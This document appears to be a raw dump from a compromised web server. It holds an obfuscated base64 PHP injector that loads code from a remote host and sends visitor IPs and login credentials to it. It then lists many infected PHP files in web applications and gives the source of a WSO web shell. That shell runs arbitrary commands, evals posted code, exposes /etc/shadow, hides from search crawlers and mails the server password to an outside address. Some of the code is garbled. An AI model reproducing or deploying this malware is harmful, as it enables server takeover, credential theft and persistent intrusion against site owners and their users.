GFuZCBpc3NldCgkX1BPU1RbInAiXSkpe2lmKGlzc2V0KCRfUE9TVFsiaW5wdXQiXSkpeyR1c2VyX2F1dGg9IiZsPSIuYmFzZTY0X2VuY29kZSgkX1BPU1RbImwiXSkuIiZwPSIuYmFzZTY0X2VuY29kZShtZDUoJF9QT1NUWyJwIl0pKTt9ZWxzZXskdXNlcl9hdXRoPSImbD0iLiRfUE9TVFsibCJdLiImcD0iLiRfUE9TVFsicCJdO319ZWxzZXskdXNlcl9hdXRoPSIiO31pZighaXNzZXQoJF9QT1NUWyJsb2dfZmxnIl0pKXskbG9nX2ZsZz0iJmxvZyI7fQ0KJHJraHQ9MTsNCmlmKHZlcnNpb25fY29tcGFyZShQSFBfVkVSU0lPTiwnNS4yJywnPj0nKSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2luY2x1ZGUnKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQppZigkcmtodD09MSl7aWYoaW5pX2dldCgnYWxsb3dfdXJsX2ZvcGVuJykpeyRya2h0PTE7fWVsc2V7JHJraHQ9MDt9fQ0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiIkcCIuYmFzZTY0X2RlY29kZSgiTG5WelpYSnpMbUpwYzJobGJHd3VjblU9IikuIi8/cl9hZGRyPSIuc3ByaW50ZigiJXUiLCBpcDJsb25nKGdldGVudihSRU1PVEVfQUREUikpKS4iJnVybD0iLmJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbUkVRVUVTVF9VUkldKS4kdXNlcl9hdXRoLiRsb2dfZmxnKSl7aWYoJF9QT1NUWyJsIl09PSJzcGVjaWFsIil7cHJpbnQgInN5c19hY3RpdmUiLmB1bmFtZSAtYWA7fX19DQplbHNle3N0cmVhbV93cmFwcGVyX3JlZ2lzdGVyKCdodHRwMicsJ25ld2h0dHAnKTtpZighQGluY2x1ZGVfb25jZShiYXNlNjRfZGVjb2RlKCJhSFIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>

for files:

/home/www/confixx/html/webapps:

./knowledgetree/remote.php
./knowledgetree/download.php
./phpAds/guest.php
./phpAds/create.php
./phpMyFamily/time.php
./phpMyFamily/date.php
./CSLH/report.php
./CSLH/date.php
./weberp/system.php
./weberp/properties.php
./xoops/report.php
./xoops/include.php
./PHProjekt/time.php
./PHProjekt/date.php
./formmail/system.php
./formmail/properties.php
./xrms/includes.php
./xrms/configs.php
./classifieds/base.php
./classifieds/download.php
./HelpCenterLive/links.php
./HelpCenterLive/tests.php
./SSM/includes.php
./SSM/configs.php
./typo/links.php
./typo/tests.php
./4images/options.php
./4images/commands.php
./getid/includes.php
./getid/configs.php
./nucleus/options.php
./nucleus/commands.php
./openit/time.php
./openit/system.php
./tsep/remote.php
./tsep/package.php
./Events/remote.php
./Events/package.php
./Care2x/includes.php
./Care2x/include.php
./pmachinefree/time.php
./pmachinefree/system.php
./gallery/time.php
./gallery/date.php
./videodb/finfo.php
./videodb/contacts.php
./phpdocumentor/base.php
./phpdocumentor/create.php
./UebiMiau/finfo.php
./UebiMiau/tests.php
./Owl/system.php
./Owl/properties.php
./phpSupportTickets/report.php
./phpSupportTickets/include.php
./Links/finfo.php
./Links/contacts.php
./kplaylist/links.php
./kplaylist/package.php
./phpnuke/links.php
./phpnuke/package.php
./bbclone/messages.php
./bbclone/configs.php
./Tellme/links.php
./Tellme/package.php
./phpBugTracker/finfo.php
./phpBugTracker/contacts.php
./sendcard/report.php
./sendcard/date.php
./osCommerce/report.php
./osCommerce/date.php
./skins/includes.php
./skins/include.php
./AutoIndex/time.php
./AutoIndex/system.php
./phpWiki/includes.php
./phpWiki/configs.php
./phpmyforum/remote.php
./phpmyforum/download.php
./openbiblio/layout.php
./openbiblio/properties.php
./osTicket/includes.php
./osTicket/include.php
./phpwhois/layout.php
./phpwhois/properties.php
./AdvancedPoll/layout.php
./AdvancedPoll/properties.php
./PostNuke/report.php
./PostNuke/include.php
./phpDig/common.php
./phpDig/commands.php
./mediawiki/finfo.php
./mediawiki/tests.php
./guestbook/base.php
./guestbook/create.php
./agoracart/report.php
./agoracart/date.php
./cubecart/links.php
./cubecart/tests.php
./xaraya/time.php
./xaraya/date.php
./phpbannerexchange/guest.php
./phpbannerexchange/messages.php
./wbbook/layout.php
./wbbook/options.php
./Siteframe/guest.php
./Siteframe/messages.php
./Drupal/base.php
./Drupal/download.php
./YaBB/time.php
./YaBB/system.php
./phpBB/base.php
./phpBB/download.php
./template/guest.php
./template/create.php
./phpwcms/common.php
./phpwcms/contacts.php
./escene/layout.php
./escene/options.php
./phpwebsite/options.php
./phpwebsite/commands.php
./Coppermine/messages.php
./Coppermine/configs.php
./phpsurveyor/finfo.php
./phpsurveyor/tests.php
./creloaded/remote.php
./creloaded/package.php
./phpList/layout.php
./phpList/options.php
./phpBBAuction/remote.php
./phpBBAuction/package.php
./SupportLogic/base.php
./SupportLogic/create.php
./DocFAQ/guest.php
./DocFAQ/create.php
./gtchat/guest.php
./gtchat/messages.php
./phpMoney/system.php
./phpMoney/properties.php
./MovableType/layout.php
./MovableType/options.php
./squirrelmail/messages.php
./squirrelmail/configs.php
./topdownloads/base.php
./topdownloads/download.php
./noahclass/common.php
./noahclass/contacts.php
./Mambo/common.php
./Mambo/commands.php
./eGroupWare/common.php
./eGroupWare/commands.php
./WebCalendar/common.php
./WebCalendar/contacts.php
./b2evolution/includes.php
./b2evolution/include.php
./vstat/common.php
./vstat/commands.php
./zencart/guest.php
./zencart/messages.php
./WordPress/layout.php
./WordPress/properties.php
./phpBook/links.php
./phpBook/tests.php
./pLog/messages.php
./pLog/configs.php
./geeklog/report.php
./geeklog/include.php
./bookstore/guest.php
./bookstore/create.php
./WebShopmanager/options.php
./WebShopmanager/commands.php
./TUTOS/remote.php
./TUTOS/download.php
./dotproject/finfo.php
./dotproject/contacts.php

/home/www/confixx/html/webapps:

./report.php
./mskin_17/buttons/report.php
./mskin_17/buttons/include.php
./mskin_17/small_icons/common.php
./mskin_17/small_icons/contacts.php
./mskin_17/system.php
./mskin_17/properties.php
./mskin_17/css/left/base.php
./mskin_17/css/left/create.php
./mskin_17/css/top/links.php
./mskin_17/css/top/package.php
./mskin_17/css/help/guest.php
./mskin_17/css/help/messages.php
./mskin_17/css/includes.php
./mskin_17/css/main/remote.php
./mskin_17/css/main/download.php
./mskin_17/css/configs.php
./mskin_17/images/finfo.php
./mskin_17/images/tests.php
./mskin_17/big_icons/time.php
./mskin_17/big_icons/date.php
./include.php
./mskin_15/buttons/base.php
./mskin_15/buttons/create.php
./mskin_15/small_icons/time.php
./mskin_15/small_icons/system.php
./mskin_15/includes.php
./mskin_15/css/left/finfo.php
./mskin_15/css/left/tests.php
./mskin_15/css/top/options.php
./mskin_15/css/top/commands.php
./mskin_15/css/remote.php
./mskin_15/css/help/links.php
./mskin_15/css/help/package.php
./mskin_15/css/main/common.php
./mskin_15/css/main/contacts.php
./mskin_15/css/download.php
./mskin_15/images/layout.php
./mskin_15/images/properties.php
./mskin_15/configs.php
./mskin_15/big_icons/guest.php
./mskin_15/big_icons/messages.php

/home/www/confixx/html/nagioss -> shell

/home/www/confixx/html/post.php

<?php
//-----------------Password---------------------
$â297a57a5a743894a0e4a801fc3"; //admin
$â = "#fff";
$â = true;
$â = 'UTF-8';
$â = 'FilesMan';
$â = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
 prototype(md5($_SERVER['HTTP_HOST'])."key", $â);
}
if(empty($_POST['charset']))
 $_POST['charset'] = $â;
if (!isset($_POST['ne'])) {
 if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '4.1.0');
if(get_magic_quotes_gpc()) {
 function stripslashes_array($array) {
  return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
 }
 $_POST = stripslashes_array($_POST);
    $_COOKIE = stripslashes_array($_COOKIE);
}
if(!empty($â
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $â
rototype(md5($_SERVER['HTTP_HOST']), $â
f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â
ardLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
 $os = 'win';
else
 $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
 @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
 $home_cwd = str_replace("\\", "/", $home_cwd);
 $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
 $cwd .= '/';
function hardHeader() {
 if(empty($_POST['charset']))
  $_POST['charset'] = $GLOBALS['â'];
 global $â;
 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
<style>
 body {background-color:#060a10;color:#e1e1e1;}
 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
 table.info {color:#C3C3C3;background-color:#060a10;}
 span,h1,a {color:$â !important;}
 span  {font-weight:bolder;}
 h1    {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
 div.content {padding:5px;margin-left:5px;background-color:#060a10;}
 a    {text-decoration:none;}
 a:hover   {text-decoration:underline;}
 .ml1  {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;}
 .bigarea {width:100%;height:250px; }
 input, textarea, select  {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;}
 form  {margin:0px;}
 #toolsTbl {text-align:center;}
 .toolsInp {width:300px}
 .main th {text-align:left;background-color:#060a10;}
 .main tr:hover{background-color:#354252;}
 .main td, th{vertical-align:middle;}
 .l1    {background-color:#1e252e;}
 pre    {font:9pt Courier New;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
 
 function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
 function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
 function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
 function set(a,c,p1,p2,p3,charset) {
  if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 }
 function g(a,c,p1,p2,p3,charset) {
  set(a,c,p1,p2,p3,charset);
  d.mf.submit();
 }
 function a(a,c,p1,p2,p3,charset) {
  set(a,c,p1,p2,p3,charset);
  var params = 'ajax=true';
  for(i=0;i<d.mf.elements.length;i++)
   params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
 }
 function sr(url, params) {
  if (window.XMLHttpRequest)
   req = new XMLHttpRequest();
  else if (window.ActiveXObject)
   req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
 }
 function processReqChange() {
  if( (req.readyState == 4) )
   if(req.status == 200) {
    var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
    var arr=reg.exec(req.responseText);
    eval(arr[2].substr(0, arr[1]));
   } else alert('Request error!');
 }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
 $freeSpace = @diskfreespace($GLOBALS['cwd']);
 $totalSpace = @disk_total_space($GLOBALS['cwd']);
 $totalSpace = $totalSpace?$totalSpace:1;
 $release = @php_uname('r');
 $kernel = @php_uname('s');
 $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
 if(strpos('Linux', $kernel) !== false)
  $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
 else
  $explink .= urlencode($kernel . ' ' . substr($release,0,3));
 if(!function_exists('posix_getegid')) {
  $user = @get_current_user();
  $uid = @getmyuid();
  $gid = @getmygid();
  $group = "?";
 } else {
  $uid = @posix_getpwuid(@posix_geteuid());
  $gid = @posix_getgrgid(@posix_getegid());
  $user = $uid['name'];
  $uid = $uid['uid'];
  $group = $gid['name'];
  $gid = $gid['gid'];
 }
 $cwd_links = '';
 $path = explode("/", $GLOBALS['cwd']);
 $n=count($path);
 for($i=0; $i<$n-1; $i++) {
  $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  for($j=0; $j<=$i; $j++)
   $cwd_links .= $path[$j].'/';
  $cwd_links .= "\")'>".$path[$i]."/</a>";
 }
 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
 $opt_charsets = '';
 foreach($charsets as $â)
  $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>';
 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
 if(!empty($GLOBALS['â))
 $m['Logout'] = 'Logout';
 $m['Self remove'] = 'SelfRemove';
 $menu = '';
 foreach($m as $k => $v)
  $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
 $drives = "";
 if ($GLOBALS['os'] == 'win') {
  foreach(range('c','z') as $drive)
  if (is_dir($drive.':\\'))
   $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 }
 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'.
   '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'.
   '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'.
   '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>';
}
function hardFooter() {
 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
 <tr>
  <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
  <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
 </tr><tr>
  <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
  <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
 </tr><tr>
  <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
  <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
  <input type=hidden name=a value='FilesMan'>
  <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  <input type=hidden name=p1 value='uploadFile'>
  <input type=hidden name=ne value=''>
  <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='>>'></form><br  ></td>
 </tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
 $â = '';
 if (function_exists('exec')) {
  @exec($in,$â);
  $â = @join("\n",$â);
 } elseif (function_exists('passthru')) {
  ob_start();
  @passthru($in);
  $â = ob_get_clean();
 } elseif (function_exists('system')) {
  ob_start();
  @system($in);
  $â = ob_get_clean();
 } elseif (function_exists('shell_exec')) {
  $â = shell_exec($in);
 } elseif (is_resource($f = @popen($in,"r"))) {
  $â = "";
  while(!@feof($f))
   $â .= fread($f,1024);
  pclose($f);
 }else return "â³ Unable to execute command\n";
 return ($â==''?"â³ Query did not return anything\n":$â);
}
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â;
 
if(array_key_exists('pff',$_POST)){
  $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp);
}
function hardLogin() {
  if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
  }
 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>");
}
function viewSize($s) {
 if($s >= 1073741824)
  return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 elseif($s >= 1048576)
  return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 elseif($s >= 1024)
  return sprintf('%1.2f', $s / 1024 ) . ' KB';
 else
  return $s . ' B';
}
function perms($p) {
 if (($p & 0xC000) == 0xC000)$i = 's';
 elseif (($p & 0xA000) == 0xA000)$i = 'l';
 elseif (($p & 0x8000) == 0x8000)$i = '-';
 elseif (($p & 0x6000) == 0x6000)$i = 'b';
 elseif (($p & 0x4000) == 0x4000)$i = 'd';
 elseif (($p & 0x2000) == 0x2000)$i = 'c';
 elseif (($p & 0x1000) == 0x1000)$i = 'p';
 else $i = 'u';
 $i .= (($p & 0x0100) ? 'r' : '-');
 $i .= (($p & 0x0080) ? 'w' : '-');
 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 $i .= (($p & 0x0020) ? 'r' : '-');
 $i .= (($p & 0x0010) ? 'w' : '-');
 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 $i .= (($p & 0x0004) ? 'r' : '-');
 $i .= (($p & 0x0002) ? 'w' : '-');
 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 return $i;
}
function viewPermsColor($f) {
 if (!@is_readable($f))
  return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
 elseif (!@is_writable($f))
  return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
 else
  return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
}
function hardScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
function which($p) {
 $path = ex('which ' . $p);
 if(!empty($path))
  return $path;
 return false;
}
function actionRC() {
 if(!@$_POST['p1']) {
  $a = array(
   "uname" => php_uname(),
   "php_version" => phpversion(),
   "VERSION" => VERSION,
   "safemode" => @ini_get('safe_mode')
  );
  echo serialize($a);
 } else {
  eval($_POST['p1']);
 }
}
function prototype($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function actionSecInfo() {
 hardHeader();
 echo '<h1>Server security information</h1><div class=content>';
 function showSecParam($n, $v) {
  $v = trim($v);
  if($v) {
   echo '<span>' . $n . ': </span>';
   if(strpos($v, "\n") === false)
    echo $v . '<br>';
   else
    echo '<pre class=ml1>' . $v . '</pre>';
  }
 }
 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
 showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
 showSecParam('Open base dir', @ini_get('open_basedir'));
 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
 $temp=array();
 if(function_exists('mysql_get_client_info'))
  $temp[] = "MySql (".mysql_get_client_info().")";
 if(function_exists('mssql_connect'))
  $temp[] = "MSSQL";
 if(function_exists('pg_connect'))
  $temp[] = "PostgreSQL";
 if(function_exists('oci_connect'))
  $temp[] = "Oracle";
 showSecParam('Supported databases', implode(', ', $temp));
 echo '<br>';
 if($GLOBALS['os'] == 'nix') {
            showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            showSecParam('OS version', @file_get_contents('/proc/version'));
            showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                showSecParam('HDD space', ex('df -h'));
                showSecParam('Hosts', @file_get_contents('/etc/hosts'));
    showSecParam('Mount options', @file_get_contents('/etc/fstab'));
            }
 } else {
  showSecParam('OS Version',ex('ver'));
